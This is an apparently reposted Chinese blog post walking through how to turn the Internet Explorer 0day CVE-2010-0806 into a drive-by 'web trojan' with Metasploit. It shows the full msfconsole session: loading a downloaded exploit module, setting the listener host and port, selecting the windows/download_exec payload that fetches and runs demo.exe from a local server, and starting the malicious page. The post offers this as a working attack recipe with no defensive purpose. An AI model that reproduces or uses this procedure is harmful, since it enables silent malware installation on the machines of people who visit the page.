关于最近那个网马0day(CVE-2010-0806)用Metasploit生成方法

一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb

二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。我改个了名字叫ie.rb

三、启动msfconsole

四、msf > use exploit/test/ie

msf exploit(ie) > show optinos

回显:

Module options:

Name        Current Setting Required Description
—-        ————— ——– ———–
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)
Exploit target:

Id Name
— —-
0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

msf exploit(ie) > set srvhost 192.168.0.3
srvhost => 192.168.0.3
msf exploit(ie) > set srvport 8080
srvport => 8080

msf exploit(ie) > set payload windows/download_exec
payload => windows/download_exec

msf exploit(ie) > set url http://192.168.0.3/demo.exe
url => http://192.168.0.3/demo.exe
msf exploit(ie) > exploit
[*] Exploit running as background job.

msf exploit(ie) >
[*] Using URL: http://192.168.0.3:8080/4rJ0JRSnX55wAY
[*] Server started.

然后打开http://192.168.0.3:8080/4rJ0JRSnX55wAY,你就可以看到源码了。

红字是命令,其它的是回显

from:http://hi.baidu.com/myvbscript/blog/item/c1444edf23fa3e1848540320.html

发表评论

电子邮件地址不会被公开。

您可以使用这些HTML标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>